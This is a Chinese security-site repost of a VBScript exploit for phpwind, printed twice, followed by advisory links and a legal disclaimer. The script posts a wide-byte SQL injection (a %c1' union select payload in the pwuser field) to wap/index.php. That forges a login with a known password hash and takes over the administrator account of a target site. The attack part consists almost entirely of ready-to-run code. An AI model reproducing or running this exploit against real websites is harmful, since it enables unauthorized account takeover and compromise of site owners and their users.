phpwind任意修改管理员密码漏洞 VBS版利用程序 's

admin 2017年4月21日17:27:09评论254 views字数 866阅读2分53秒阅读模式
摘要

作者:Tr4c3‘phpwind任意修改管理员密码漏洞 VBS版利用程序 By Tr4c3
Dim strUrl, strPost, xPost, strGet
Set Args = Wscript.Arguments
If Args.count<>2 Then
Wscript.Echo “Usage: ” & Wscript.ScriptName & ” http://hi.baidu.com/tr4c3/ 1″
Wscript.Quit
Else
strUrl = Args(0) & “wap/index.php”

strPost = “db_wapifopen=1&prog=login&pwuser=shit%c1’union select “& Args(1) &”,mid(md5(666666),9,16),3,1,5/*&pwpwd=666666″
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.open “POST”, strUrl, False
xPost.SetRequestHeader “Referer”, strUrl
xPost.SetRequestHeader “Content-Type”, “application/x-www-form-urlencoded”
xPost.send(strPost)
strGet = xPost.ResponseText
If InStr(strGet,”登录成功”)<>0 Then
Wscript.Echo(“执行成功”)
Else
Wscript.Echo(“执行失败”)
End If
End If

作者:Tr4c3

‘phpwind任意修改管理员密码漏洞 VBS版利用程序 By Tr4c3
Dim strUrl, strPost, xPost, strGet
Set Args = Wscript.Arguments
If Args.count<>2 Then
Wscript.Echo “Usage: ” & Wscript.ScriptName & ” http://hi.baidu.com/tr4c3/ 1″
Wscript.Quit
Else
strUrl = Args(0) & “wap/index.php”

strPost = “db_wapifopen=1&prog=login&pwuser=shit%c1’union select “& Args(1) &”,mid(md5(666666),9,16),3,1,5/*&pwpwd=666666″
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.open “POST”, strUrl, False
xPost.SetRequestHeader “Referer”, strUrl
xPost.SetRequestHeader “Content-Type”, “application/x-www-form-urlencoded”
xPost.send(strPost)
strGet = xPost.ResponseText
If InStr(strGet,”登录成功”)<>0 Then
Wscript.Echo(“执行成功”)
Else
Wscript.Echo(“执行失败”)
End If
End If

题外话:
某些人要清楚看别人的文章不一定要懂别人写exp的语言,理解了原理,用自己懂的语言搞个exp是很容易的,别动不动就觉得别人搞笑。乱改别人文章是不好的。
漏洞信息:http://www.80sec.com/phpwind-admin-pass-change-vul.html
相关阅读:http://hi.baidu.com/biweilun/blog/item/21c0cf1781585b0fc93d6dd7.html

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月21日17:27:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpwind任意修改管理员密码漏洞 VBS版利用程序 'shttps://cn-sec.com/archives/45366.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息